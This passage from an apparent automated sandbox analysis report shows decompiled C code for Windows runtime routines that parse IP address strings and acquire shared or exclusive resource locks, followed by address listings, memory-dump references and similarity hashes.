                                                                                                                                                            						if(_v16 != 2) {
                                                                                                                                                            							goto L6;
                                                                                                                                                            						}
                                                                                                                                                            						 *((short*)(_a12 + _v20 * 2)) = 0;
                                                                                                                                                            						L47:
                                                                                                                                                            						if(_t174 != 0) {
                                                                                                                                                            							E021E8980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
                                                                                                                                                            							_t116 = 8;
                                                                                                                                                            							E021DDFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
                                                                                                                                                            						}
                                                                                                                                                            						return 0;
                                                                                                                                                            					}
                                                                                                                                                            					if(_t180 != 0) {
                                                                                                                                                            						if(_v12 > 3) {
                                                                                                                                                            							goto L6;
                                                                                                                                                            						}
                                                                                                                                                            						_t120 = E02210CFA(_v28, 0, 0xa);
                                                                                                                                                            						_t183 = _t183 + 0xc;
                                                                                                                                                            						if(_t120 > 0xff) {
                                                                                                                                                            							goto L6;
                                                                                                                                                            						}
                                                                                                                                                            						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
                                                                                                                                                            						goto L47;
                                                                                                                                                            					}
                                                                                                                                                            					if(_v12 > 4) {
                                                                                                                                                            						goto L6;
                                                                                                                                                            					}
                                                                                                                                                            					_t121 = E02210CFA(_v28, _t180, 0x10);
                                                                                                                                                            					_t183 = _t183 + 0xc;
                                                                                                                                                            					 *((short*)(_a12 + _v20 * 2)) = _t121;
                                                                                                                                                            					goto L47;
                                                                                                                                                            				} else {
                                                                                                                                                            					while(1) {
                                                                                                                                                            						_t123 = _v16;
                                                                                                                                                            						if(_t123 == 0) {
                                                                                                                                                            							goto L7;
                                                                                                                                                            						}
                                                                                                                                                            						_t108 = _t123 - 1;
                                                                                                                                                            						if(_t108 != 0) {
                                                                                                                                                            							goto L1;
                                                                                                                                                            						}
                                                                                                                                                            						_t178 = _t141;
                                                                                                                                                            						if(E022106BA(_t108, _t141) == 0 || _t135 == 0) {
                                                                                                                                                            							if(E022106BA(_t135, _t178) == 0 || E02210A5B(_t136, _t178) == 0) {
                                                                                                                                                            								if(_t141 != 0x3a) {
                                                                                                                                                            									if(_t141 == 0x2e) {
                                                                                                                                                            										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
                                                                                                                                                            											goto L41;
                                                                                                                                                            										} else {
                                                                                                                                                            											_v24 = _v24 + 1;
                                                                                                                                                            											L27:
                                                                                                                                                            											_v16 = _v16 & 0x00000000;
                                                                                                                                                            											L28:
                                                                                                                                                            											if(_v28 == 0) {
                                                                                                                                                            												goto L20;
                                                                                                                                                            											}
                                                                                                                                                            											_t177 = _v24;
                                                                                                                                                            											if(_t177 != 0) {
                                                                                                                                                            												if(_v12 > 3) {
                                                                                                                                                            													L6:
                                                                                                                                                            													return 0xc000000d;
                                                                                                                                                            												}
                                                                                                                                                            												_t132 = E02210CFA(_v28, 0, 0xa);
                                                                                                                                                            												_t183 = _t183 + 0xc;
                                                                                                                                                            												if(_t132 > 0xff) {
                                                                                                                                                            													goto L6;
                                                                                                                                                            												}
                                                                                                                                                            												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
                                                                                                                                                            												goto L20;
                                                                                                                                                            											}
                                                                                                                                                            											if(_v12 > 4) {
                                                                                                                                                            												goto L6;
                                                                                                                                                            											}
                                                                                                                                                            											_t133 = E02210CFA(_v28, 0, 0x10);
                                                                                                                                                            											_t183 = _t183 + 0xc;
                                                                                                                                                            											_v20 = _v20 + 1;
                                                                                                                                                            											 *((short*)(_a12 + _v20 * 2)) = _t133;
                                                                                                                                                            											goto L20;
                                                                                                                                                            										}
                                                                                                                                                            									}
                                                                                                                                                            									goto L41;
                                                                                                                                                            								}
                                                                                                                                                            								if(_v24 > 0 || _v8 > 6) {
                                                                                                                                                            									goto L41;
                                                                                                                                                            								} else {
                                                                                                                                                            									_t130 = _t179 + 1;
                                                                                                                                                            									if( *_t130 == _t141) {
                                                                                                                                                            										if(_v32 != 0) {
                                                                                                                                                            											goto L41;
                                                                                                                                                            										}
                                                                                                                                                            										_v32 = _v8 + 1;
                                                                                                                                                            										_t156 = 2;
                                                                                                                                                            										_v8 = _v8 + _t156;
                                                                                                                                                            										L34:
                                                                                                                                                            										_t179 = _t130;
                                                                                                                                                            										_v16 = _t156;
                                                                                                                                                            										goto L28;
                                                                                                                                                            									}
                                                                                                                                                            									_v8 = _v8 + 1;
                                                                                                                                                            									goto L27;
                                                                                                                                                            								}
                                                                                                                                                            							} else {
                                                                                                                                                            								_v12 = _v12 + 1;
                                                                                                                                                            								if(_v24 > 0) {
                                                                                                                                                            									goto L41;
                                                                                                                                                            								}
                                                                                                                                                            								_a7 = 1;
                                                                                                                                                            								goto L20;
                                                                                                                                                            							}
                                                                                                                                                            						} else {
                                                                                                                                                            							_v12 = _v12 + 1;
                                                                                                                                                            							L20:
                                                                                                                                                            							_t179 = _t179 + 1;
                                                                                                                                                            							_t141 =  *_t179;
                                                                                                                                                            							if(_t141 == 0) {
                                                                                                                                                            								goto L41;
                                                                                                                                                            							}
                                                                                                                                                            							continue;
                                                                                                                                                            						}
                                                                                                                                                            						L7:
                                                                                                                                                            						if(_t141 == 0x3a) {
                                                                                                                                                            							if(_v24 > 0 || _v8 > 0) {
                                                                                                                                                            								goto L41;
                                                                                                                                                            							} else {
                                                                                                                                                            								_t130 = _t179 + 1;
                                                                                                                                                            								if( *_t130 != _t141) {
                                                                                                                                                            									goto L41;
                                                                                                                                                            								}
                                                                                                                                                            								_v20 = _v20 + 1;
                                                                                                                                                            								_t156 = 2;
                                                                                                                                                            								_v32 = 1;
                                                                                                                                                            								_v8 = _t156;
                                                                                                                                                            								 *((short*)(_a12 + _v20 * 2)) = 0;
                                                                                                                                                            								goto L34;
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						L8:
                                                                                                                                                            						if(_v8 > 7) {
                                                                                                                                                            							goto L41;
                                                                                                                                                            						}
                                                                                                                                                            						_t142 = _t141;
                                                                                                                                                            						if(E022106BA(_t123, _t141) == 0 || _t124 == 0) {
                                                                                                                                                            							if(E022106BA(_t124, _t142) == 0 || E02210A5B(_t125, _t142) == 0 || _v24 > 0) {
                                                                                                                                                            								goto L41;
                                                                                                                                                            							} else {
                                                                                                                                                            								_t128 = 1;
                                                                                                                                                            								_a7 = 1;
                                                                                                                                                            								_v28 = _t179;
                                                                                                                                                            								_v16 = 1;
                                                                                                                                                            								_v12 = 1;
                                                                                                                                                            								L39:
                                                                                                                                                            								if(_v16 == _t128) {
                                                                                                                                                            									goto L20;
                                                                                                                                                            								}
                                                                                                                                                            								goto L28;
                                                                                                                                                            							}
                                                                                                                                                            						} else {
                                                                                                                                                            							_a7 = 0;
                                                                                                                                                            							_v28 = _t179;
                                                                                                                                                            							_v16 = 1;
                                                                                                                                                            							_v12 = 1;
                                                                                                                                                            							goto L20;
                                                                                                                                                            						}
                                                                                                                                                            					}
                                                                                                                                                            				}
                                                                                                                                                            				L1:
                                                                                                                                                            				_t123 = _t108 == 1;
                                                                                                                                                            				if(_t108 == 1) {
                                                                                                                                                            					goto L8;
                                                                                                                                                            				}
                                                                                                                                                            				_t128 = 1;
                                                                                                                                                            				goto L39;
                                                                                                                                                            			}

























                                                                                                                                                            0x02210b21
                                                                                                                                                            0x02210b24
                                                                                                                                                            0x02210b27
                                                                                                                                                            0x02210b2a
                                                                                                                                                            0x02210b2d
                                                                                                                                                            0x02210b30
                                                                                                                                                            0x02210b33
                                                                                                                                                            0x02210b36
                                                                                                                                                            0x02210b39
                                                                                                                                                            0x02210b3e
                                                                                                                                                            0x02210c65
                                                                                                                                                            0x02210c68
                                                                                                                                                            0x02210c6a
                                                                                                                                                            0x02210c6f
                                                                                                                                                            0x0223eb42
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0223eb48
                                                                                                                                                            0x0223eb48
                                                                                                                                                            0x02210c75
                                                                                                                                                            0x02210c7a
                                                                                                                                                            0x0223eb54
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0223eb5a
                                                                                                                                                            0x02210c80
                                                                                                                                                            0x02210c84
                                                                                                                                                            0x0223eb98
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0223eba6
                                                                                                                                                            0x02210cb8
                                                                                                                                                            0x02210cba
                                                                                                                                                            0x02210cd3
                                                                                                                                                            0x02210cda
                                                                                                                                                            0x02210ce4
                                                                                                                                                            0x02210ce9
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02210cec
                                                                                                                                                            0x02210c8c
                                                                                                                                                            0x0223eb63
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0223eb70
                                                                                                                                                            0x0223eb75
                                                                                                                                                            0x0223eb7d
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0223eb8c
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0223eb8c
                                                                                                                                                            0x02210c96
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02210ca2
                                                                                                                                                            0x02210cac
                                                                                                                                                            0x02210cb4
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02210b44
                                                                                                                                                            0x02210b47
                                                                                                                                                            0x02210b49
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02210b4f
                                                                                                                                                            0x02210b50
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02210b56
                                                                                                                                                            0x02210b62
                                                                                                                                                            0x02210b7c
                                                                                                                                                            0x02210bac
                                                                                                                                                            0x02210a0f
                                                                                                                                                            0x0223eaaa
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0223eac4
                                                                                                                                                            0x0223eac4
                                                                                                                                                            0x02210bd0
                                                                                                                                                            0x02210bd0
                                                                                                                                                            0x02210bd4
                                                                                                                                                            0x02210bd9
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02210bdb
                                                                                                                                                            0x02210be0
                                                                                                                                                            0x0223eb0e
                                                                                                                                                            0x02210a1a
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02210a1a
                                                                                                                                                            0x0223eb1a
                                                                                                                                                            0x0223eb1f
                                                                                                                                                            0x0223eb27
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0223eb36
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0223eb36
                                                                                                                                                            0x02210bea
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02210bf6
                                                                                                                                                            0x02210c00
                                                                                                                                                            0x02210c03
                                                                                                                                                            0x02210c0b
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02210c0b
                                                                                                                                                            0x0223eaaa
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02210a15
                                                                                                                                                            0x02210bb6
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02210bc6
                                                                                                                                                            0x02210bc6
                                                                                                                                                            0x02210bcb
                                                                                                                                                            0x02210c15
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02210c1d
                                                                                                                                                            0x02210c20
                                                                                                                                                            0x02210c21
                                                                                                                                                            0x02210c24
                                                                                                                                                            0x02210c24
                                                                                                                                                            0x02210c26
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02210c26
                                                                                                                                                            0x02210bcd
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02210bcd
                                                                                                                                                            0x02210b89
                                                                                                                                                            0x02210b89
                                                                                                                                                            0x02210b90
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02210b96
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02210b96
                                                                                                                                                            0x02210a04
                                                                                                                                                            0x02210a04
                                                                                                                                                            0x02210b9a
                                                                                                                                                            0x02210b9a
                                                                                                                                                            0x02210b9b
                                                                                                                                                            0x02210b9f
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02210ba5
                                                                                                                                                            0x02210ac7
                                                                                                                                                            0x02210aca
                                                                                                                                                            0x0223eacf
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0223eade
                                                                                                                                                            0x0223eade
                                                                                                                                                            0x0223eae3
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0223eaf3
                                                                                                                                                            0x0223eaf6
                                                                                                                                                            0x0223eaf7
                                                                                                                                                            0x0223eafe
                                                                                                                                                            0x0223eb01
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0223eb01
                                                                                                                                                            0x0223eacf
                                                                                                                                                            0x02210ad0
                                                                                                                                                            0x02210ad4
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02210ada
                                                                                                                                                            0x02210ae6
                                                                                                                                                            0x02210c34
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02210c47
                                                                                                                                                            0x02210c49
                                                                                                                                                            0x02210c4a
                                                                                                                                                            0x02210c4e
                                                                                                                                                            0x02210c51
                                                                                                                                                            0x02210c54
                                                                                                                                                            0x02210c57
                                                                                                                                                            0x02210c5a
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02210c60
                                                                                                                                                            0x02210afb
                                                                                                                                                            0x02210afe
                                                                                                                                                            0x02210b02
                                                                                                                                                            0x02210b05
                                                                                                                                                            0x02210b08
                                                                                                                                                            0x00000000
                                                                                                                                                            0x02210b08
                                                                                                                                                            0x02210ae6
                                                                                                                                                            0x02210b44
                                                                                                                                                            0x022109f8
                                                                                                                                                            0x022109f8
                                                                                                                                                            0x022109f9
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0223eaa0
                                                                                                                                                            0x00000000

                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.2380389755.00000000021C0000.00000040.00000001.sdmp, Offset: 021B0000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.2380381681.00000000021B0000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380554938.00000000022A0000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380560407.00000000022B0000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380566043.00000000022B4000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380572289.00000000022B7000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380578244.00000000022C0000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000008.00000002.2380623418.0000000002320000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __fassign
                                                                                                                                                            • String ID: .$:$:
                                                                                                                                                            • API String ID: 3965848254-2308638275
                                                                                                                                                            • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                            • Instruction ID: e4d3de58c6dae4fb1c1adc1b567b61cf055a3e8b2dade1e0b98778348e9e7f05
                                                                                                                                                            • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                            • Instruction Fuzzy Hash: 47A17E71D2020ADECF24CFD4C854AAEB7F5AF25309F24846ADC42A7289D7745B85CF91
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 49%
                                                                                                                                                            			E02210554(signed int _a4, char _a8) {
                                                                                                                                                            				void* __ebx;
                                                                                                                                                            				void* __edi;
                                                                                                                                                            				void* __esi;
                                                                                                                                                            				signed int* _t49;
                                                                                                                                                            				signed int _t51;
                                                                                                                                                            				signed int _t56;
                                                                                                                                                            				signed int _t58;
                                                                                                                                                            				signed int _t61;
                                                                                                                                                            				signed int _t63;
                                                                                                                                                            				void* _t66;
                                                                                                                                                            				intOrPtr _t67;
                                                                                                                                                            				signed int _t70;
                                                                                                                                                            				void* _t75;
                                                                                                                                                            				signed int _t81;
                                                                                                                                                            				signed int _t84;
                                                                                                                                                            				void* _t86;
                                                                                                                                                            				signed int _t93;
                                                                                                                                                            				signed int _t96;
                                                                                                                                                            				intOrPtr _t105;
                                                                                                                                                            				signed int _t107;
                                                                                                                                                            				void* _t110;
                                                                                                                                                            				signed int _t115;
                                                                                                                                                            				signed int* _t119;
                                                                                                                                                            				void* _t125;
                                                                                                                                                            				void* _t126;
                                                                                                                                                            				signed int _t128;
                                                                                                                                                            				signed int _t130;
                                                                                                                                                            				signed int _t138;
                                                                                                                                                            				signed int _t144;
                                                                                                                                                            				void* _t158;
                                                                                                                                                            				void* _t159;
                                                                                                                                                            				void* _t160;
                                                                                                                                                            
                                                                                                                                                            				_t96 = _a4;
                                                                                                                                                            				_t115 =  *(_t96 + 0x28);
                                                                                                                                                            				_push(_t138);
                                                                                                                                                            				if(_t115 < 0) {
                                                                                                                                                            					_t105 =  *[fs:0x18];
                                                                                                                                                            					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
                                                                                                                                                            					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
                                                                                                                                                            						goto L6;
                                                                                                                                                            					} else {
                                                                                                                                                            						__eflags = _t115 | 0xffffffff;
                                                                                                                                                            						asm("lock xadd [eax], edx");
                                                                                                                                                            						return 1;
                                                                                                                                                            					}
                                                                                                                                                            				} else {
                                                                                                                                                            					L6:
                                                                                                                                                            					_push(_t128);
                                                                                                                                                            					while(1) {
                                                                                                                                                            						L7:
                                                                                                                                                            						__eflags = _t115;
                                                                                                                                                            						if(_t115 >= 0) {
                                                                                                                                                            							break;
                                                                                                                                                            						}
                                                                                                                                                            						__eflags = _a8;
                                                                                                                                                            						if(_a8 == 0) {
                                                                                                                                                            							__eflags = 0;
                                                                                                                                                            							return 0;
                                                                                                                                                            						} else {
                                                                                                                                                            							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                                                                                                                            							_t49 = _t96 + 0x1c;
                                                                                                                                                            							_t106 = 1;
                                                                                                                                                            							asm("lock xadd [edx], ecx");
                                                                                                                                                            							_t115 =  *(_t96 + 0x28);
                                                                                                                                                            							__eflags = _t115;
                                                                                                                                                            							if(_t115 < 0) {
                                                                                                                                                            								L23:
                                                                                                                                                            								_t130 = 0;
                                                                                                                                                            								__eflags = 0;
                                                                                                                                                            								while(1) {
                                                                                                                                                            									_t118 =  *(_t96 + 0x30) & 0x00000001;
                                                                                                                                                            									asm("sbb esi, esi");
                                                                                                                                                            									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x022b01c0;
                                                                                                                                                            									_push(_t144);
                                                                                                                                                            									_push(0);
                                                                                                                                                            									_t51 = E021CF8CC( *((intOrPtr*)(_t96 + 0x18)));
                                                                                                                                                            									__eflags = _t51 - 0x102;
                                                                                                                                                            									if(_t51 != 0x102) {
                                                                                                                                                            										break;
                                                                                                                                                            									}
                                                                                                                                                            									_t106 =  *(_t144 + 4);
                                                                                                                                                            									_t126 =  *_t144;
                                                                                                                                                            									_t86 = E02214FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
                                                                                                                                                            									_push(_t126);
                                                                                                                                                            									_push(_t86);
                                                                                                                                                            									E02223F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
                                                                                                                                                            									E02223F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                                                                                                                            									_t130 = _t130 + 1;
                                                                                                                                                            									_t160 = _t158 + 0x28;
                                                                                                                                                            									__eflags = _t130 - 2;
                                                                                                                                                            									if(__eflags > 0) {
                                                                                                                                                            										E0225217A(_t106, __eflags, _t96);
                                                                                                                                                            									}
                                                                                                                                                            									_push("RTL: Re-Waiting\n");
                                                                                                                                                            									_push(0);
                                                                                                                                                            									_push(0x65);
                                                                                                                                                            									E02223F92();
                                                                                                                                                            									_t158 = _t160 + 0xc;
                                                                                                                                                            								}
                                                                                                                                                            								__eflags = _t51;
                                                                                                                                                            								if(__eflags < 0) {
                                                                                                                                                            									_push(_t51);
                                                                                                                                                            									E02213915(_t96, _t106, _t118, _t130, _t144, __eflags);
                                                                                                                                                            									asm("int3");
                                                                                                                                                            									while(1) {
                                                                                                                                                            										L32:
                                                                                                                                                            										__eflags = _a8;
                                                                                                                                                            										if(_a8 == 0) {
                                                                                                                                                            											break;
                                                                                                                                                            										}
                                                                                                                                                            										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                                                                                                                            										_t119 = _t96 + 0x24;
                                                                                                                                                            										_t107 = 1;
                                                                                                                                                            										asm("lock xadd [eax], ecx");
                                                                                                                                                            										_t56 =  *(_t96 + 0x28);
                                                                                                                                                            										_a4 = _t56;
                                                                                                                                                            										__eflags = _t56;
                                                                                                                                                            										if(_t56 != 0) {
                                                                                                                                                            											L40:
                                                                                                                                                            											_t128 = 0;
                                                                                                                                                            											__eflags = 0;
                                                                                                                                                            											while(1) {
                                                                                                                                                            												_t121 =  *(_t96 + 0x30) & 0x00000001;
                                                                                                                                                            												asm("sbb esi, esi");
                                                                                                                                                            												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x022b01c0;
                                                                                                                                                            												_push(_t138);
                                                                                                                                                            												_push(0);
                                                                                                                                                            												_t58 = E021CF8CC( *((intOrPtr*)(_t96 + 0x20)));
                                                                                                                                                            												__eflags = _t58 - 0x102;
                                                                                                                                                            												if(_t58 != 0x102) {
                                                                                                                                                            													break;
                                                                                                                                                            												}
                                                                                                                                                            												_t107 =  *(_t138 + 4);
                                                                                                                                                            												_t125 =  *_t138;
                                                                                                                                                            												_t75 = E02214FC0(_t125, _t107, 0xff676980, 0xffffffff);
                                                                                                                                                            												_push(_t125);
                                                                                                                                                            												_push(_t75);
                                                                                                                                                            												E02223F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
                                                                                                                                                            												E02223F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                                                                                                                            												_t128 = _t128 + 1;
                                                                                                                                                            												_t159 = _t158 + 0x28;
                                                                                                                                                            												__eflags = _t128 - 2;
                                                                                                                                                            												if(__eflags > 0) {
                                                                                                                                                            													E0225217A(_t107, __eflags, _t96);
                                                                                                                                                            												}
                                                                                                                                                            												_push("RTL: Re-Waiting\n");
                                                                                                                                                            												_push(0);
                                                                                                                                                            												_push(0x65);
                                                                                                                                                            												E02223F92();
                                                                                                                                                            												_t158 = _t159 + 0xc;
                                                                                                                                                            											}
                                                                                                                                                            											__eflags = _t58;
                                                                                                                                                            											if(__eflags < 0) {
                                                                                                                                                            												_push(_t58);
                                                                                                                                                            												E02213915(_t96, _t107, _t121, _t128, _t138, __eflags);
                                                                                                                                                            												asm("int3");
                                                                                                                                                            												_t61 =  *_t107;
                                                                                                                                                            												 *_t107 = 0;
                                                                                                                                                            												__eflags = _t61;
                                                                                                                                                            												if(_t61 == 0) {
                                                                                                                                                            													L1:
                                                                                                                                                            													_t63 = E021F5384(_t138 + 0x24);
                                                                                                                                                            													if(_t63 != 0) {
                                                                                                                                                            														goto L52;
                                                                                                                                                            													} else {
                                                                                                                                                            														goto L2;
                                                                                                                                                            													}
                                                                                                                                                            												} else {
                                                                                                                                                            													_t123 =  *((intOrPtr*)(_t138 + 0x18));
                                                                                                                                                            													_push( &_a4);
                                                                                                                                                            													_push(_t61);
                                                                                                                                                            													_t70 = E021CF970( *((intOrPtr*)(_t138 + 0x18)));
                                                                                                                                                            													__eflags = _t70;
                                                                                                                                                            													if(__eflags >= 0) {
                                                                                                                                                            														goto L1;
                                                                                                                                                            													} else {
                                                                                                                                                            														_push(_t70);
                                                                                                                                                            														E02213915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
                                                                                                                                                            														L52:
                                                                                                                                                            														_t122 =  *((intOrPtr*)(_t138 + 0x20));
                                                                                                                                                            														_push( &_a4);
                                                                                                                                                            														_push(1);
                                                                                                                                                            														_t63 = E021CF970( *((intOrPtr*)(_t138 + 0x20)));
                                                                                                                                                            														__eflags = _t63;
                                                                                                                                                            														if(__eflags >= 0) {
                                                                                                                                                            															L2:
                                                                                                                                                            															return _t63;
                                                                                                                                                            														} else {
                                                                                                                                                            															_push(_t63);
                                                                                                                                                            															E02213915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
                                                                                                                                                            															_t109 =  *((intOrPtr*)(_t138 + 0x20));
                                                                                                                                                            															_push( &_a4);
                                                                                                                                                            															_push(1);
                                                                                                                                                            															_t63 = E021CF970( *((intOrPtr*)(_t138 + 0x20)));
                                                                                                                                                            															__eflags = _t63;
                                                                                                                                                            															if(__eflags >= 0) {
                                                                                                                                                            																goto L2;
                                                                                                                                                            															} else {
                                                                                                                                                            																_push(_t63);
                                                                                                                                                            																_t66 = E02213915(_t96, _t109, _t122, _t128, _t138, __eflags);
                                                                                                                                                            																asm("int3");
                                                                                                                                                            																while(1) {
                                                                                                                                                            																	_t110 = _t66;
                                                                                                                                                            																	__eflags = _t66 - 1;
                                                                                                                                                            																	if(_t66 != 1) {
                                                                                                                                                            																		break;
                                                                                                                                                            																	}
                                                                                                                                                            																	_t128 = _t128 | 0xffffffff;
                                                                                                                                                            																	_t66 = _t110;
                                                                                                                                                            																	asm("lock cmpxchg [ebx], edi");
                                                                                                                                                            																	__eflags = _t66 - _t110;
                                                                                                                                                            																	if(_t66 != _t110) {
                                                                                                                                                            																		continue;
                                                                                                                                                            																	} else {
                                                                                                                                                            																		_t67 =  *[fs:0x18];
                                                                                                                                                            																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
                                                                                                                                                            																		return _t67;
                                                                                                                                                            																	}
                                                                                                                                                            																	goto L58;
                                                                                                                                                            																}
                                                                                                                                                            																E021F5329(_t110, _t138);
                                                                                                                                                            																return E021F53A5(_t138, 1);
                                                                                                                                                            															}
                                                                                                                                                            														}
                                                                                                                                                            													}
                                                                                                                                                            												}
                                                                                                                                                            											} else {
                                                                                                                                                            												_t56 =  *(_t96 + 0x28);
                                                                                                                                                            												goto L3;
                                                                                                                                                            											}
                                                                                                                                                            										} else {
                                                                                                                                                            											_t107 =  *_t119;
                                                                                                                                                            											__eflags = _t107;
                                                                                                                                                            											if(__eflags > 0) {
                                                                                                                                                            												while(1) {
                                                                                                                                                            													_t81 = _t107;
                                                                                                                                                            													asm("lock cmpxchg [edi], esi");
                                                                                                                                                            													__eflags = _t81 - _t107;
                                                                                                                                                            													if(_t81 == _t107) {
                                                                                                                                                            														break;
                                                                                                                                                            													}
                                                                                                                                                            													_t107 = _t81;
                                                                                                                                                            													__eflags = _t81;
                                                                                                                                                            													if(_t81 > 0) {
                                                                                                                                                            														continue;
                                                                                                                                                            													}
                                                                                                                                                            													break;
                                                                                                                                                            												}
                                                                                                                                                            												_t56 = _a4;
                                                                                                                                                            												__eflags = _t107;
                                                                                                                                                            											}
                                                                                                                                                            											if(__eflags != 0) {
                                                                                                                                                            												while(1) {
                                                                                                                                                            													L3:
                                                                                                                                                            													__eflags = _t56;
                                                                                                                                                            													if(_t56 != 0) {
                                                                                                                                                            														goto L32;
                                                                                                                                                            													}
                                                                                                                                                            													_t107 = _t107 | 0xffffffff;
                                                                                                                                                            													_t56 = 0;
                                                                                                                                                            													asm("lock cmpxchg [edx], ecx");
                                                                                                                                                            													__eflags = 0;
                                                                                                                                                            													if(0 != 0) {
                                                                                                                                                            														continue;
                                                                                                                                                            													} else {
                                                                                                                                                            														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                                                                                            														return 1;
                                                                                                                                                            													}
                                                                                                                                                            													goto L58;
                                                                                                                                                            												}
                                                                                                                                                            												continue;
                                                                                                                                                            											} else {
                                                                                                                                                            												goto L40;
                                                                                                                                                            											}
                                                                                                                                                            										}
                                                                                                                                                            										goto L58;
                                                                                                                                                            									}
                                                                                                                                                            									__eflags = 0;
                                                                                                                                                            									return 0;
                                                                                                                                                            								} else {
                                                                                                                                                            									_t115 =  *(_t96 + 0x28);
                                                                                                                                                            									continue;
                                                                                                                                                            								}
                                                                                                                                                            							} else {
                                                                                                                                                            								_t106 =  *_t49;
                                                                                                                                                            								__eflags = _t106;
                                                                                                                                                            								if(__eflags > 0) {
                                                                                                                                                            									while(1) {
                                                                                                                                                            										_t93 = _t106;
                                                                                                                                                            										asm("lock cmpxchg [edi], esi");
                                                                                                                                                            										__eflags = _t93 - _t106;
                                                                                                                                                            										if(_t93 == _t106) {
                                                                                                                                                            											break;
                                                                                                                                                            										}
                                                                                                                                                            										_t106 = _t93;
                                                                                                                                                            										__eflags = _t93;
                                                                                                                                                            										if(_t93 > 0) {
                                                                                                                                                            											continue;
                                                                                                                                                            										}
                                                                                                                                                            										break;
                                                                                                                                                            									}
                                                                                                                                                            									__eflags = _t106;
                                                                                                                                                            								}
                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                            									continue;
                                                                                                                                                            								} else {
                                                                                                                                                            									goto L23;
